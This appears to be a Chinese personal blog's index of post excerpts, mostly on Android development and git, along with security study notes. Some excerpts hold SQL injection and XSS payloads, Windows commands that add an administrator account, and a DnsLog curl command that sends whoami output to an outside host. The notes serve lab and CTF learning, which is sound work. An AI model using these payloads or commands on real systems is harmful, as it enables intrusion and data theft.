反汇编工具 Apktool/ShakaApktool apktool Download ShakaApktool Github 作者已经不更新了 smali/baksmali dex2jar enjarify 静态分析工具 android-classyshark jadx JD-GUI BytecodeViewer Andr...

效果如下 思路1.定义两个title布局2.监听ScrollView控件在下面布局不可见的时候显示第二个title布局 关键代码：java： scrollView.setOnScrollChangeListener(new View.OnScrollChangeListener() { @Override public v...

URL中的大小写敏感http://fred:wilma@www.example.com/private.asp?doc=3&part=4#footer 协议标示符 （http/https） 大小写不敏感 HTTP、http、hTtP 用户ID和密码 （fred和wilma）可能大小写敏感 取决于你的服务器软件 机器的名称（www....

SSL和HTTPS加密技术只能保护你的会话所使用的信道。它保护通信不被窃听，甚至能够让你更加肯定正在交谈的两台计算机的身份，而我们所测试的是在通信末端的软件的行为。HTTP和HTTPS之间唯一的区别在于HTTPS连接在初始化有额外的设置。它建立起一条安全信道，然后通过这条安全信道来发送标准的HTTP。你将会看到，测试HTTPS应用时，通常你需要做的唯一...

前言：Termux是一款开源且不需要root，运行在Android终端上极其强大的linux模拟器，支持apt管理软件包，完美支持python,ruby,go,nodejs。本文使用termux搭建Nmap、Sqlmap、BBScan、subDomainsBrute、Hydra、RouterSploit等实现支持端口扫描、注入检测、子域名爆破、多协议弱...

目录 SQL注入原理 SQL注入原理-SQL注入产生原因 SQL注入原理-SQL注入核心原理 SQL注入的危害 mysql注入语句 mysql注入语句-mysql介绍 mysql注入语句-万能密码 mysql注入语句-注入语句例子 sql注入流程 MySQL手工注入方法 TIPS 实例 相关链接 SQL注入原理SQL注入原理-SQL注入产...

这是一个xss的闯关游戏 下载链接:提取码: isre xss的语句 1 <script>alert(/xss/)</script> 2 "><script>alert(/xss/)</script> 3 'onmouseover='alert(/xss/)&#...

小生不才，未得姑娘青睐，打扰姑娘良久，姑娘莫怪，自此，所有爱慕之意止于唇齿，匿于年华。姑娘往南我变往北，在不叨扰，就此别过，望姑娘日后善其身，遇良人。予君欢喜城，暖色浮余生。若忆起昔日海誓山盟，笑笑了之。 这一天，一个采药师陪同他的弟弟，来到山中采药。不料，遇到了一群狼，两个人手里只有镰刀作为武器。采药师为了保护他的弟弟，说:“我去引开狼，你找到...

在线solidityIDEsolidity 类&函数pragma solidity ^0.4.25; contract Demo1{ // 创建一个函数 function shwo(int num) public returns(int,int){ return (num,num+1); } } ...

比特币比特币区块 区块链概念 钱包 比特币总量 BCT官网 数字货币价格查询 BTC历史分叉 ETH和EOS差异 网页版钱包 区块链专利排名 区块链项目 支付宝爱心捐赠平台 区块链游戏-CryptoKitties迷恋猫 版权保护-百度图腾 百度图腾介绍 以太坊eth solidity ...

前言 ConstraintLayout 出来也有一段时间，虽说也有很多坑，但是一些属性还是特别好用的，在项目中我也逐渐在使用，下面是用ConstraintLayout实现的一个标签栏的样式例子。 1.android布局-ConstraintLayout-约束布局 效果 思路1. 定义两条横向约束线(Guideline) 2. 横向排列5个控件(...

Windows基础命令net user xx query user #查看用户登录情况 whoami #当前用户权限 systeminfo #查看当前系统版本与补丁信息 net user xx 123456 /add #添加用户 net localgroup administrators xx /add #添加到管理员组 net local...

博客自定义指南博客链接/blog linktea9 使用Jekyll博客引擎基于Theme H2O修改 前置条件/Before：需要你有GitHubGithub PageJekyll环境 如以上都有还有问题请参考使用jekyll搭建个人博客jekyll-theme-H2O_README 步骤/Step：github目录 克隆项目： ...

示例图 分析：通过分析原型图，分为4个模块 1.轮播图2.公告3.指示器4.内容列表 实现：轮播图使用BGABanner-Android库公告使用ViewFlipper控件指示器切换使用MagicIndicator库内容列表使用ViewPager+Fragment（RecyclerView） 其他依赖： ankoBaseRecycl...

Tipsoh-my-zsh ，“zsh: command not found: adb”解决方法 open .zshrc 在# User configuration添加 source ~/.bash_profile 执行 source .zshrc 关于Android的命令更新Android SDK $ adnroid update sdk --...

tips这个软件是收费的免费版不能修改icon和包名 使用html一键打包工具HTML一键打包APK工具 HTML压缩包下载 部署项目文件-部署-Android/IOS 使用HTML一键打包工具进行打包1.下载HTML一键打包工具2.安装HTML一键打包工具路径选择为www下index.html 注意事项1.文件名不要中文2.项目中不能含有中文...

忘了什么时候整理了！！！ ctfwiki 工具： 看雪CTF工具 brainfuck fuckjs Writeuphttp://bobao.360.cn/ctf/detail/173.htmlhttp://www.freebuf.com/articles/web/94444.html ziphttp://bobao.360...

Fragment懒加载用于viewpager+fragment布局 import android.os.Bundle; import android.view.LayoutInflater; import android.view.View; import android.view.ViewGroup; import android.view.Vi...

Git命令行基础Git是一个开源的分布式版本控制工具 配置身份 git config --global user.name "Tony" git config --global user.email "tony@gmail.com" 检查是否配置成功 git config --global user.name...

策略模式视频地址http://www.imooc.com/video/3213 策略模式 ： 将可变的部分 从程序中抽象分离成算法接口在该接口下分别封装一系列的算法实现并使他们可以相互等候，从而导致客户端程序独立于算法的改变。 不变更代码架构通过开发与重构拥抱需求的变化使用策略模式 虚拟应用： 鸭子应用飞行的能力更多鸭子类型每六个月发...

Burp抓Android的包设置ip设置-网络-查看ip地址 burp-设置ip 手机 电脑要跟手机连同一个wifiwifi-修改网络wifi密码钥匙串 火狐浏览器配置 安装证书设置浏览器代理火狐浏览器-首选项-网络代理-设置然后访问http://127.0.0.1:8080/下载证书保存文件把后缀名修改成cer 华为手机：手...

这是看了i春秋课程的学习笔记CTF入门如何学习 CTF对我们的意义-CTF类型CTF题目的类型1.Web2.Crypto3.PWN4.Misc 1.stego 2.forendics 3.等等 5.ReversePPC(Professionally ProgramCoder) 著名的CTF比赛-国际比赛：DEFCON资格赛 DE...

打开文件 vi ~/.bash_profile 添加命令 alias subl=\''/Applications/Sublime Text.app/Contents/SharedSupport/bin/subl'\' 启动 source ~/.bash_profile 使用命令 subl 文件/目录 subl ./_...

wikimoe_live2dLive2D看板娘来了！typecho插件给博客添加能动的看板娘(Live2D)-将其添加到网页上吧emlog插件版之给博客加上能陪聊的Live2d版伊斯特瓦尔【ver1.04】博客通用版Live2d伊斯特瓦尔发布 一言

文件上传检测流程 前端提交：javaScript检测、Flash AS检测app：java代码检测 数据传输：形成的报文到后端处理 -> 会存在WAF拦截、IPS入侵防御拦截 后端处理：文件扩展名检测、MIME TYPE检测（报文文件参数content type）、文件格式检测、内容检测（检测恶意代码） 写入文件系统：文件重命名、强制...

1.克隆项目 git clone <项目链接> 2.进入项目 cd work 3.列出所有分支 git branch -a 输出 remotes/origin/dev remotes/origin/release 4.切换远程开发分支 git checkout -b dev origin/dev 切换远程分支origi...

上传&上传漏洞&上传检测流程什么是文件上传 文件上传是一个网站的常见功能，多用于上传照片、视频、文档等许多类型文件。 上传文件流程 1.前端选择文件，进行提交。（浏览器端点击上传）2.浏览器形成POST MultiPart报文发送到服务器。（一般看不到 使用抓包工具查看content type 上传文件使用multipart...

stuffin-一个在线星系模拟网站seti研究所seti屏幕保护下载链接-帮助seti计算的一个软件

TOOLSapktool apktool文档 dex2jar jd-gui jadx SHELLjadx:简直是神器啊 直接把apk拖进去就可以了 apktool:获取资源文件 java -jar apktool.jar d -f <xx.apk> -o <XX> java -jar apktool...

一、Markdown是什么？Markdown是一种轻量级标记语言（标记语言是用一系列规则描述简单格式的文本语言。） 二、Markdown的语法1.标题# 一级标题## 二级标题 还可以下面这种写法 一级标题\==== 二级标题-— 2.图片![Foo](http://i.weather.com.cn/...

01 二次编码注入原理+，=，&，；原始数据不适合传输 index.php?id=1&name=admin&pwd=123 name=admin= name=admin& admin= php urldecode('%3d') --> = // 如果这样的参数会引起歧义 php会自动解码...

android思维导图

ConstraintLayout 是什么？ConstraintLayout ConstraintLayout 怎么用？基本用法 layout_constraint[当前控件位置]_[目标控件位置]="[目标控件ID]" 1.上下排列 a b b: app:layout_constraintTop_toBottomOf=...

这是一个读两周自制脚本语言的笔记，然后立flag，这个月打算看完 day 11.1 机器语言 & 汇编语言 机器语言： 不需要借助软件执行，不需要语言处理器，可以由硬件直接解释执行 一个位数很长的二进制数字 汇编语言： 通过汇编语言程序表述巨大的数字，使其易于理解，需要通过软件转换成机器语言，这种软件称为汇编程序。汇编程序是一种最基本的语...

01 宽字节注入原理 什么是宽字节GB2312、GBK、GB8030、BIG5、Shift_JIS等这些都是常说的宽字节，实际为两字节。 站点可能为了防止SQL注入，会加\转义’，最后变成\’ MySQL在使用GBK编码的时候，会认为两个字符为一个汉字。使用%df’进行编码，两个字符组合，认为是一个汉字。注：前一个Ascii码大于128才能到汉...

github上fork了别人的项目后，再同步更新别人的提交 git remote -v git remote add upstream aaa git remote -v git remote remove upstream 4.重新添加源代码库 git remote add upstream <fork link> git remote...

jekyll-theme-H2O的gitalk配置 gitalk 01.注册GitHub Application注册GitHub Application Application name:项目名称 Homepage URL:域名地址 Application description:项目描述 Authorization callb...

需要目标机器时windows系统 DnsLog盲注DnsLog盲注原理Dnslog平台：http://ceye.io/ http://ceye.io/profile curl mzq83x.ceye.io curl `whoami`.mzq83x.ceye.io DnsLog盲注方法 核心语法： SELECT LOAD_FILE(CONCA...

时间盲注时间盲注原理 时间盲注方法 http://localhost:90/Less-10/?id=1" and if(left(user(),1)='a',0,sleep(3))--+ http://localhost:90/Less-10/?id=1" and if(left(select table_name...

SQL盲注-布尔盲注01布尔盲注原理$id=$_GET['id']; $sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1 "; $result=mysql_query($sql); $row=mysql_fetch_array($result); if...

github测试地址微信SDK下载地址微信开放平台微信api 开始接入微信登录1.申请你的AppID注意： 包名正确（重要）签名正确（重要）微信提供的签名生成工具把包名添加上去就可以获取签名注意：把要获取签名的应用安装在手机上获取签名应用 2.下载开发工具包https://open.weixin.qq.com/cgi-bin/showdoc...

实现思路就是在一个recyclerview的adapter中 在初始化一个recyclerview 的adapter 布局文件activity_main.xml <ScrollView xmlns:android="http://schemas.android.com/apk/res/android" xmlns:...

2017 10 27EventBus是什么？首先有两个概念发布者/订阅者 发布者就是 发送事件订阅者 就是接收事件 gradle compile 'org.greenrobot:eventbus:3.0.0' 1.定义事件 // 定义事件 这个就是你要传送的数据实体类 public static class MessageE...

利用http与微信通信换取用户信息和openid使用了okhttp作为http通信的框架 首先实例化okhttp连接 private final OkHttpClient client = new OkHttpClient(); 获得codecase BaseResp.ErrCode.ERR_OK: // 可用以下两种方法获...

原文地址 把重点记录下https://source.android.com/source/code-style.html 1.不要忽略异常(空的catch字句) 不要不捕获异常 2.不要使用Findlizer Finalizer是一种在对象被垃圾回收时执行一段代码的方法。虽然他们可以方便地进行清理（特别是外部资源），但是没有保证什么...

edx：edX是麻省理工和哈佛大学于2012年4月联手创建的大规模开放在线课堂平台。它免费给大众提供大学教育水平的在线课堂。两所大学在这个非盈利性计划各资助三千万美元。2012年秋天，edX在MITx启动。https://www.edx.org/coursehttps://www.edx.org/edxchina coursera：在线学习平台。推...

报错注入01 报错注入原理构造payload让信息通过错误提示回显出来应用场景：查询不回显内容，会打印错误信息Update、insert等语句，会打印错误信息 if($row) { echo 'Your Login name:'.$row['username']; } else { print_r(m...

union查询注入union介绍SQL UNION 操作符用于合并两个或多个SELECT语句的结果集。注意：SELECT语句必须拥有相同数量的列。列也必须拥有相似的数据类型。每条SELECT语句中列的顺序必须相同。 默认情况，UNION操作符选取不同的值，允许重复的值，使用UNION ALL。 SELECT column_name(s) FRO...

docker images docker run -dt --name sqli -p 90:80 --rm acgpiano/sqli-labs docker ps -a docker exec -it <id> /bin/bash mysql -uroot // 进入 mysql docker ps -a docker s...

关键代码which python3.6 brew install pyenv pyenv install --list // 可安装的python版本 pyenv install -v 2.7.10 // 安装python pyenv rehash // 更新 pyenv versions // 查看已经安装的python版本 pyenv glob...